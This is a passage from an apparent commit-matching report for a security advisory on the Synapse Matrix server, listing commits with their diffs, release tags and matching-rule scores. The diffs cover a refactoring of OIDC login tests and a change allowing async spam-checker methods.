"v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8986, 8986", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: version", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8986", + "relevance": 2 + } + ] + }, + { + "commit_id": "895e04319ba457a855207b8bb804f7360a258464", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607945930, + "hunks": 47, + "message": "Preparatory refactoring of the OidcHandlerTestCase (#8911) * Remove references to handler._auth_handler (and replace them with hs.get_auth_handler) * Factor out a utility function for building Requests * Remove mocks of `OidcHandler._map_userinfo_to_user` This method is going away, so mocking it out is no longer a valid approach. Instead, we mock out lower-level methods (eg _remote_id_from_userinfo), or simply allow the regular implementation to proceed and update the expectations accordingly. * Remove references to `OidcHandler._map_userinfo_to_user` from tests This method is going away, so we can no longer use it as a test point. Instead we build mock \"callback\" requests which we pass into `handle_oidc_callback`, and verify correct behaviour by mocking out `AuthHandler.complete_sso_login`.", + "diff": [ + "diff --git a/changelog.d/8911.feature b/changelog.d/8911.feature", + "new file mode 100644", + "index 000000000..d450ef499", + "--- /dev/null", + "+++ b/changelog.d/8911.feature", + "@@ -0,0 +1 @@", + "+Add support for allowing users to pick their own user ID during a single-sign-on login.", + "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", + "index 1d99a4543..9878527ba 100644", + "--- a/tests/handlers/test_oidc.py", + "+++ b/tests/handlers/test_oidc.py", + "@@ -17,3 +17,3 @@ from urllib.parse import parse_qs, urlparse", + "-from mock import Mock, patch", + "+from mock import ANY, Mock, patch", + "@@ -84,3 +84,3 @@ class TestMappingProviderFailures(TestMappingProvider):", + "-def simple_async_mock(return_value=None, raises=None):", + "+def simple_async_mock(return_value=None, raises=None) -> Mock:", + " # AsyncMock is not available in python3.5, this mimics part of its behaviour", + "@@ -162,2 +162,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " self.render_error.reset_mock()", + "+ return args", + "@@ -376,7 +377,8 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "+ username = \"bar\"", + " userinfo = {", + " \"sub\": \"foo\",", + "- \"preferred_username\": \"bar\",", + "+ \"username\": username,", + " }", + "- user_id = \"@foo:domain.org\"", + "+ expected_user_id = \"@%s:%s\" % (username, self.hs.hostname)", + " self.handler._exchange_code = simple_async_mock(return_value=token)", + "@@ -384,14 +386,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", + "- self.handler._map_userinfo_to_user = simple_async_mock(return_value=user_id)", + "- self.handler._auth_handler.complete_sso_login = simple_async_mock()", + "- request = Mock(", + "- spec=[", + "- \"args\",", + "- \"getCookie\",", + "- \"addCookie\",", + "- \"requestHeaders\",", + "- \"getClientIP\",", + "- \"get_user_agent\",", + "- ]", + "- )", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "@@ -403,3 +395,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " ip_address = \"10.0.0.1\"", + "- request.getCookie.return_value = self.handler._generate_oidc_session_token(", + "+ session = self.handler._generate_oidc_session_token(", + " state=state,", + "@@ -409,9 +401,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " )", + "-", + "- request.args = {}", + "- request.args[b\"code\"] = [code.encode(\"utf-8\")]", + "- request.args[b\"state\"] = [state.encode(\"utf-8\")]", + "-", + "- request.getClientIP.return_value = ip_address", + "- request.get_user_agent.return_value = user_agent", + "+ request = self._build_callback_request(", + "+ code, state, session, user_agent=user_agent, ip_address=ip_address", + "+ )", + "@@ -419,4 +407,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "- self.handler._auth_handler.complete_sso_login.assert_called_once_with(", + "- user_id, request, client_redirect_url, {},", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ expected_user_id, request, client_redirect_url, {},", + " )", + "@@ -424,5 +412,2 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " self.handler._parse_id_token.assert_called_once_with(token, nonce=nonce)", + "- self.handler._map_userinfo_to_user.assert_called_once_with(", + "- userinfo, token, user_agent, ip_address", + "- )", + " self.handler._fetch_userinfo.assert_not_called()", + "@@ -431,8 +416,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " # Handle mapping errors", + "- self.handler._map_userinfo_to_user = simple_async_mock(", + "- raises=MappingException()", + "- )", + "- self.get_success(self.handler.handle_oidc_callback(request))", + "- self.assertRenderedError(\"mapping_error\")", + "- self.handler._map_userinfo_to_user = simple_async_mock(return_value=user_id)", + "+ with patch.object(", + "+ self.handler,", + "+ \"_remote_id_from_userinfo\",", + "+ new=Mock(side_effect=MappingException()),", + "+ ):", + "+ self.get_success(self.handler.handle_oidc_callback(request))", + "+ self.assertRenderedError(\"mapping_error\")", + "@@ -443,6 +429,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "- self.handler._auth_handler.complete_sso_login.reset_mock()", + "+ auth_handler.complete_sso_login.reset_mock()", + " self.handler._exchange_code.reset_mock()", + " self.handler._parse_id_token.reset_mock()", + "- self.handler._map_userinfo_to_user.reset_mock()", + " self.handler._fetch_userinfo.reset_mock()", + "@@ -453,4 +438,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "- self.handler._auth_handler.complete_sso_login.assert_called_once_with(", + "- user_id, request, client_redirect_url, {},", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ expected_user_id, request, client_redirect_url, {},", + " )", + "@@ -458,5 +443,2 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " self.handler._parse_id_token.assert_not_called()", + "- self.handler._map_userinfo_to_user.assert_called_once_with(", + "- userinfo, token, user_agent, ip_address", + "- )", + " self.handler._fetch_userinfo.assert_called_once_with(token)", + "@@ -611,19 +593,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " \"sub\": \"foo\",", + "+ \"username\": \"foo\",", + " \"phone\": \"1234567\",", + " }", + "- user_id = \"@foo:domain.org\"", + " self.handler._exchange_code = simple_async_mock(return_value=token)", + " self.handler._parse_id_token = simple_async_mock(return_value=userinfo)", + "- self.handler._map_userinfo_to_user = simple_async_mock(return_value=user_id)", + "- self.handler._auth_handler.complete_sso_login = simple_async_mock()", + "- request = Mock(", + "- spec=[", + "- \"args\",", + "- \"getCookie\",", + "- \"addCookie\",", + "- \"requestHeaders\",", + "- \"getClientIP\",", + "- \"get_user_agent\",", + "- ]", + "- )", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "@@ -631,3 +603,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " client_redirect_url = \"http://client/redirect\"", + "- request.getCookie.return_value = self.handler._generate_oidc_session_token(", + "+ session = self.handler._generate_oidc_session_token(", + " state=state,", + "@@ -637,9 +609,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " )", + "-", + "- request.args = {}", + "- request.args[b\"code\"] = [b\"code\"]", + "- request.args[b\"state\"] = [state.encode(\"utf-8\")]", + "-", + "- request.getClientIP.return_value = \"10.0.0.1\"", + "- request.get_user_agent.return_value = \"Browser\"", + "+ request = self._build_callback_request(\"code\", state, session)", + "@@ -647,4 +613,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "- self.handler._auth_handler.complete_sso_login.assert_called_once_with(", + "- user_id, request, client_redirect_url, {\"phone\": \"1234567\"},", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@foo:test\", request, client_redirect_url, {\"phone\": \"1234567\"},", + " )", + "@@ -653,2 +619,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " \"\"\"Ensure that mapping the userinfo returned from a provider to an MXID works properly.\"\"\"", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+", + " userinfo = {", + "@@ -657,10 +626,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- # The token doesn't matter with the default user mapping provider.", + "- token = {}", + "- mxid = self.get_success(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@test_user:test\", ANY, ANY, {}", + " )", + "- self.assertEqual(mxid, \"@test_user:test\")", + "+ auth_handler.complete_sso_login.reset_mock()", + "@@ -671,8 +637,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- mxid = self.get_success(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@test_user_2:test\", ANY, ANY, {}", + " )", + "- self.assertEqual(mxid, \"@test_user_2:test\")", + "+ auth_handler.complete_sso_login.reset_mock()", + "@@ -685,10 +650,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " userinfo = {\"sub\": \"test3\", \"username\": \"test_user_3\"}", + "- e = self.get_failure(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- ),", + "- MappingException,", + "- )", + "- self.assertEqual(", + "- str(e.value), \"Mapping provider does not support de-duplicating Matrix IDs\",", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_not_called()", + "+ self.assertRenderedError(", + "+ \"mapping_error\",", + "+ \"Mapping provider does not support de-duplicating Matrix IDs\",", + " )", + "@@ -704,2 +666,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+", + " # Map a user via SSO.", + "@@ -709,17 +674,14 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- token = {}", + "- mxid = self.get_success(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ user.to_string(), ANY, ANY, {},", + " )", + "- self.assertEqual(mxid, \"@test_user:test\")", + "+ auth_handler.complete_sso_login.reset_mock()", + " # Subsequent calls should map to the same mxid.", + "- mxid = self.get_success(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ user.to_string(), ANY, ANY, {},", + " )", + "- self.assertEqual(mxid, \"@test_user:test\")", + "+ auth_handler.complete_sso_login.reset_mock()", + "@@ -734,9 +696,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- token = {}", + "- mxid = self.get_success(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ user.to_string(), ANY, ANY, {},", + " )", + "- self.assertEqual(mxid, \"@test_user:test\")", + "+ auth_handler.complete_sso_login.reset_mock()", + "@@ -757,10 +717,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- e = self.get_failure(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- ),", + "- MappingException,", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_not_called()", + "+ args = self.assertRenderedError(\"mapping_error\")", + " self.assertTrue(", + "- str(e.value).startswith(", + "+ args[2].startswith(", + " \"Attempted to login as '@TEST_USER_2:test' but it matches more than one user inexactly:\"", + "@@ -775,8 +732,6 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "- mxid = self.get_success(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@TEST_USER_2:test\", ANY, ANY, {},", + " )", + "- self.assertEqual(mxid, \"@TEST_USER_2:test\")", + "@@ -784,15 +739,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " \"\"\"If the mapping provider generates an invalid localpart it should be rejected.\"\"\"", + "- userinfo = {", + "- \"sub\": \"test2\",", + "- \"username\": \"f\u00c3\u00b6\u00c3\u00b6\",", + "- }", + "- token = {}", + "-", + "- e = self.get_failure(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- ),", + "- MappingException,", + "- )", + "- self.assertEqual(str(e.value), \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", + "+ self._make_callback_with_userinfo({\"sub\": \"test2\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", + "+ self.assertRenderedError(\"mapping_error\", \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", + "@@ -809,2 +753,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " \"\"\"The mapping provider can retry generating an MXID if the MXID is already in use.\"\"\"", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+", + " store = self.hs.get_datastore()", + "@@ -817,10 +764,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- token = {}", + "- mxid = self.get_success(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- )", + "- )", + "+ self._make_callback_with_userinfo(userinfo)", + "+", + " # test_user is already taken, so test_user1 gets registered instead.", + "- self.assertEqual(mxid, \"@test_user1:test\")", + "+ auth_handler.complete_sso_login.assert_called_once_with(", + "+ \"@test_user1:test\", ANY, ANY, {},", + "+ )", + "+ auth_handler.complete_sso_login.reset_mock()", + "@@ -840,10 +786,68 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- e = self.get_failure(", + "- self.handler._map_userinfo_to_user(", + "- userinfo, token, \"user-agent\", \"10.10.10.10\"", + "- ),", + "- MappingException,", + "+ self._make_callback_with_userinfo(userinfo)", + "+ auth_handler.complete_sso_login.assert_not_called()", + "+ self.assertRenderedError(", + "+ \"mapping_error\", \"Unable to generate a Matrix ID from the SSO response\"", + " )", + "- self.assertEqual(", + "- str(e.value), \"Unable to generate a Matrix ID from the SSO response\"", + "+", + "+ def _make_callback_with_userinfo(", + "+ self, userinfo: dict, client_redirect_url: str = \"http://client/redirect\"", + "+ ) -> None:", + "+ self.handler._exchange_code = simple_async_mock(return_value={})", + "+ self.handler._parse_id_token = simple_async_mock(return_value=userinfo)", + "+ self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", + "+ auth_handler = self.hs.get_auth_handler()", + "+ auth_handler.complete_sso_login = simple_async_mock()", + "+", + "+ state = \"state\"", + "+ session = self.handler._generate_oidc_session_token(", + "+ state=state,", + "+ nonce=\"nonce\",", + "+ client_redirect_url=client_redirect_url,", + "+ ui_auth_session_id=None,", + "+ )", + "+ request = self._build_callback_request(\"code\", state, session)", + "+", + "+ self.get_success(self.handler.handle_oidc_callback(request))", + "+", + "+ def _build_callback_request(", + "+ self,", + "+ code: str,", + "+ state: str,", + "+ session: str,", + "+ user_agent: str = \"Browser\",", + "+ ip_address: str = \"10.0.0.1\",", + "+ ):", + "+ \"\"\"Builds a fake SynapseRequest to mock the browser callback", + "+", + "+ Returns a Mock object which looks like the SynapseRequest we get from a browser", + "+ after SSO (before we return to the client)", + "+", + "+ Args:", + "+ code: the authorization code which would have been returned by the OIDC", + "+ provider", + "+ state: the \"state\" param which would have been passed around in the", + "+ query param. Should be the same as was embedded in the session in", + "+ _build_oidc_session.", + "+ session: the \"session\" which would have been passed around in the cookie.", + "+ user_agent: the user-agent to present", + "+ ip_address: the IP address to pretend the request came from", + "+ \"\"\"", + "+ request = Mock(", + "+ spec=[", + "+ \"args\",", + "+ \"getCookie\",", + "+ \"addCookie\",", + "+ \"requestHeaders\",", + "+ \"getClientIP\",", + "+ \"get_user_agent\",", + "+ ]", + " )", + "+", + "+ request.getCookie.return_value = session", + "+ request.args = {}", + "+ request.args[b\"code\"] = [code.encode(\"utf-8\")]", + "+ request.args[b\"state\"] = [state.encode(\"utf-8\")]", + "+ request.getClientIP.return_value = ip_address", + "+ request.get_user_agent.return_value = user_agent", + "+ return request" + ], + "changed_files": [ + "changelog.d/8911.feature", + "tests/handlers/test_oidc.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8911": "Preparatory refactoring of the SamlHandlerTestCase #8938 Debian builds fail with ascii encoding error on older distros #9076" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8911, 8911", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: reference, request", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8911", + "relevance": 2 + } + ] + }, + { + "commit_id": "f14428b25c37e44675edac4a80d7bd1e47112586", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607713515, + "hunks": 52, + "message": "Allow spam-checker modules to be provide async methods. (#8890) Spam checker modules can now provide async methods. This is implemented in a backwards-compatible manner.", + "diff": [ + "diff --git a/changelog.d/8890.feature b/changelog.d/8890.feature", + "new file mode 100644", + "index 000000000..97aa72a76", + "--- /dev/null", + "+++ b/changelog.d/8890.feature", + "@@ -0,0 +1 @@", + "+Spam-checkers may now define their methods as `async`.", + "diff --git a/synapse/events/spamcheck.py b/synapse/events/spamcheck.py", + "index 936896656..e7e3a7b9a 100644", + "--- a/synapse/events/spamcheck.py", + "+++ b/synapse/events/spamcheck.py", + "@@ -17,3 +17,3 @@", + " import inspect", + "-from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple", + "+from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union", + "@@ -21,2 +21,3 @@ from synapse.spam_checker_api import RegistrationBehaviour", + " from synapse.types import Collection", + "+from synapse.util.async_helpers import maybe_awaitable", + "@@ -41,3 +42,5 @@ class SpamChecker:", + "- def check_event_for_spam(self, event: \"synapse.events.EventBase\") -> bool:", + "+ async def check_event_for_spam(", + "+ self, event: \"synapse.events.EventBase\"", + "+ ) -> Union[bool, str]:", + " \"\"\"Checks if a given event is considered \"spammy\" by this server.", + "@@ -52,6 +55,7 @@ class SpamChecker:", + " Returns:", + "- True if the event is spammy.", + "+ True or a string if the event is spammy. If a string is returned it", + "+ will be used as the error message returned to the user.", + " \"\"\"", + " for spam_checker in self.spam_checkers:", + "- if spam_checker.check_event_for_spam(event):", + "+ if await maybe_awaitable(spam_checker.check_event_for_spam(event)):", + " return True", + "@@ -60,3 +64,3 @@ class SpamChecker:", + "- def user_may_invite(", + "+ async def user_may_invite(", + " self, inviter_userid: str, invitee_userid: str, room_id: str", + "@@ -77,3 +81,7 @@ class SpamChecker:", + " if (", + "- spam_checker.user_may_invite(inviter_userid, invitee_userid, room_id)", + "+ await maybe_awaitable(", + "+ spam_checker.user_may_invite(", + "+ inviter_userid, invitee_userid, room_id", + "+ )", + "+ )", + " is False", + "@@ -84,3 +92,3 @@ class SpamChecker:", + "- def user_may_create_room(self, userid: str) -> bool:", + "+ async def user_may_create_room(self, userid: str) -> bool:", + " \"\"\"Checks if a given user may create a room", + "@@ -96,3 +104,6 @@ class SpamChecker:", + " for spam_checker in self.spam_checkers:", + "- if spam_checker.user_may_create_room(userid) is False:", + "+ if (", + "+ await maybe_awaitable(spam_checker.user_may_create_room(userid))", + "+ is False", + "+ ):", + " return False", + "@@ -101,3 +112,3 @@ class SpamChecker:", + "- def user_may_create_room_alias(self, userid: str, room_alias: str) -> bool:", + "+ async def user_may_create_room_alias(self, userid: str, room_alias: str) -> bool:", + " \"\"\"Checks if a given user may create a room alias", + "@@ -114,3 +125,8 @@ class SpamChecker:", + " for spam_checker in self.spam_checkers:", + "- if spam_checker.user_may_create_room_alias(userid, room_alias) is False:", + "+ if (", + "+ await maybe_awaitable(", + "+ spam_checker.user_may_create_room_alias(userid, room_alias)", + "+ )", + "+ is False", + "+ ):", + " return False", + "@@ -119,3 +135,3 @@ class SpamChecker:", + "- def user_may_publish_room(self, userid: str, room_id: str) -> bool:", + "+ async def user_may_publish_room(self, userid: str, room_id: str) -> bool:", + " \"\"\"Checks if a given user may publish a room to the directory", + "@@ -132,3 +148,8 @@ class SpamChecker:", + " for spam_checker in self.spam_checkers:", + "- if spam_checker.user_may_publish_room(userid, room_id) is False:", + "+ if (", + "+ await maybe_awaitable(", + "+ spam_checker.user_may_publish_room(userid, room_id)", + "+ )", + "+ is False", + "+ ):", + " return False", + "@@ -137,3 +158,3 @@ class SpamChecker:", + "- def check_username_for_spam(self, user_profile: Dict[str, str]) -> bool:", + "+ async def check_username_for_spam(self, user_profile: Dict[str, str]) -> bool:", + " \"\"\"Checks if a user ID or display name are considered \"spammy\" by this server.", + "@@ -159,3 +180,3 @@ class SpamChecker:", + " # cannot modify it.", + "- if checker(user_profile.copy()):", + "+ if await maybe_awaitable(checker(user_profile.copy())):", + " return True", + "@@ -164,3 +185,3 @@ class SpamChecker:", + "- def check_registration_for_spam(", + "+ async def check_registration_for_spam(", + " self,", + "@@ -187,3 +208,5 @@ class SpamChecker:", + " if checker:", + "- behaviour = checker(email_threepid, username, request_info)", + "+ behaviour = await maybe_awaitable(", + "+ checker(email_threepid, username, request_info)", + "+ )", + " assert isinstance(behaviour, RegistrationBehaviour)", + "diff --git a/synapse/federation/federation_base.py b/synapse/federation/federation_base.py", + "index 38aa47963..383737520 100644", + "--- a/synapse/federation/federation_base.py", + "+++ b/synapse/federation/federation_base.py", + "@@ -80,2 +80,3 @@ class FederationBase:", + "+ @defer.inlineCallbacks", + " def callback(_, pdu: EventBase):", + "@@ -107,3 +108,7 @@ class FederationBase:", + "- if self.spam_checker.check_event_for_spam(pdu):", + "+ result = yield defer.ensureDeferred(", + "+ self.spam_checker.check_event_for_spam(pdu)", + "+ )", + "+", + "+ if result:", + " logger.warning(", + "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", + "index 62f98dabc..8deec4cd0 100644", + "--- a/synapse/handlers/auth.py", + "+++ b/synapse/handlers/auth.py", + "@@ -16,3 +16,2 @@", + " # limitations under the License.", + "-import inspect", + " import logging", + "@@ -61,2 +60,3 @@ from synapse.types import JsonDict, Requester, UserID", + " from synapse.util import stringutils as stringutils", + "+from synapse.util.async_helpers import maybe_awaitable", + " from synapse.util.msisdn import phone_number_to_msisdn", + "@@ -1641,4 +1641,4 @@ class PasswordProvider:", + " # until it completes.", + "- result = g(user_id=user_id, device_id=device_id, access_token=access_token,)", + "- if inspect.isawaitable(result):", + "- await result", + "+ await maybe_awaitable(", + "+ g(user_id=user_id, device_id=device_id, access_token=access_token,)", + "+ )", + "diff --git a/synapse/handlers/directory.py b/synapse/handlers/directory.py", + "index ad5683d25..abcf86352 100644", + "--- a/synapse/handlers/directory.py", + "+++ b/synapse/handlers/directory.py", + "@@ -135,3 +135,5 @@ class DirectoryHandler(BaseHandler):", + "- if not self.spam_checker.user_may_create_room_alias(user_id, room_alias):", + "+ if not await self.spam_checker.user_may_create_room_alias(", + "+ user_id, room_alias", + "+ ):", + " raise AuthError(403, \"This user is not permitted to create this alias\")", + "@@ -411,3 +413,3 @@ class DirectoryHandler(BaseHandler):", + "- if not self.spam_checker.user_may_publish_room(user_id, room_id):", + "+ if not await self.spam_checker.user_may_publish_room(user_id, room_id):", + " raise AuthError(", + "diff --git a/synapse/handlers/federation.py b/synapse/handlers/federation.py", + "index df82e60b3..fd8de8696 100644", + "--- a/synapse/handlers/federation.py", + "+++ b/synapse/handlers/federation.py", + "@@ -1595,3 +1595,3 @@ class FederationHandler(BaseHandler):", + "- if not self.spam_checker.user_may_invite(", + "+ if not await self.spam_checker.user_may_invite(", + " event.sender, event.state_key, event.room_id", + "diff --git a/synapse/handlers/message.py b/synapse/handlers/message.py", + "index 96843338a..2b8aa9443 100644", + "--- a/synapse/handlers/message.py", + "+++ b/synapse/handlers/message.py", + "@@ -746,3 +746,3 @@ class EventCreationHandler:", + "- spam_error = self.spam_checker.check_event_for_spam(event)", + "+ spam_error = await self.spam_checker.check_event_for_spam(event)", + " if spam_error:", + "diff --git a/synapse/handlers/receipts.py b/synapse/handlers/receipts.py", + "index 153cbae7b..e850e45e4 100644", + "--- a/synapse/handlers/receipts.py", + 